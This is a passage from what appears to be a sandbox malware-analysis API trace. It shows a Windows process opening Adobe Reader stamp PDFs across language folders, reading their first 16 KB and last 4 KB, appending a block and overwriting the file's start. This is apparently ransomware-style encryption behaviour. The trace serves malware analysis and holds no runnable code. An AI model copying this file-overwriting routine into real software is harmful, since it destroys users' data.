cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0074.966] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0074.968] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x70f5 [0074.968] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0074.968] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x70f5 [0074.969] WriteFile (in: hFile=0x1d4, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0074.969] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0074.969] WriteFile (in: hFile=0x1d4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0074.969] CloseHandle (hObject=0x1d4) returned 1 [0074.970] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0074.970] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.970] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x9083 [0074.971] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.971] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0074.971] ReleaseMutex (hMutex=0x168) returned 1 [0074.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0074.971] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0074.973] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8083 [0074.973] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0074.974] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8083 [0074.974] WriteFile (in: hFile=0x1d4, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0074.974] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0074.974] WriteFile (in: hFile=0x1d4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0074.975] CloseHandle (hObject=0x1d4) returned 1 [0074.975] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0074.976] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.976] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa447 [0074.976] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.976] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0074.976] ReleaseMutex (hMutex=0x168) returned 1 [0074.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0074.976] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0074.978] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9447 [0074.978] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0074.979] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9447 [0074.979] WriteFile (in: hFile=0x1d4, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0074.980] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0074.980] WriteFile (in: hFile=0x1d4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0074.980] CloseHandle (hObject=0x1d4) returned 1 [0074.980] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0074.981] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.981] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x180e0 [0074.981] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.981] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0074.981] ReleaseMutex (hMutex=0x168) returned 1 [0074.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0074.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88a64, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0074.981] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0074.983] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x170e0 [0074.983] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0074.986] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x170e0 [0074.986] WriteFile (in: hFile=0x1d4, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0074.987] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0074.988] WriteFile (in: hFile=0x1d4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0074.988] CloseHandle (hObject=0x1d4) returned 1 [0074.988] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0074.989] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.989] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1c4f5 [0074.989] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0074.989] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0074.989] ReleaseMutex (hMutex=0x168) returned 1 [0074.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0074.990] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.626] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1b4f5 [0075.630] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.630] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1b4f5 [0075.634] WriteFile (in: hFile=0x1d4, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.639] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0075.639] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.640] CloseHandle (hObject=0x1d4) returned 1 [0075.640] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0075.641] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.641] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe736 [0075.641] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.642] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.642] ReleaseMutex (hMutex=0x168) returned 1 [0075.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0075.642] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.644] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd736 [0075.644] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.645] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd736 [0075.645] WriteFile (in: hFile=0x1d4, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.646] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0075.646] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.646] CloseHandle (hObject=0x1d4) returned 1 [0075.646] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0075.647] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.647] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1ac4e [0075.647] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.647] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.647] ReleaseMutex (hMutex=0x168) returned 1 [0075.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0075.648] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.649] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x19c4e [0075.649] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.650] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x19c4e [0075.650] WriteFile (in: hFile=0x1d4, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.651] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0075.651] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.652] CloseHandle (hObject=0x1d4) returned 1 [0075.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0075.653] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.653] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x80f5 [0075.653] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0075.653] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.653] ReleaseMutex (hMutex=0x168) returned 1 [0075.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0075.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0075.653] ReadFile (in: hFile=0x1d4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.655] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x70f5 [0075.655] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.656] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x70f5 [0075.656] WriteFile (in: hFile=0x1d4, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.657] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0075.657] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.657] CloseHandle (hObject=0x1d4) returned 1 [0075.657] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 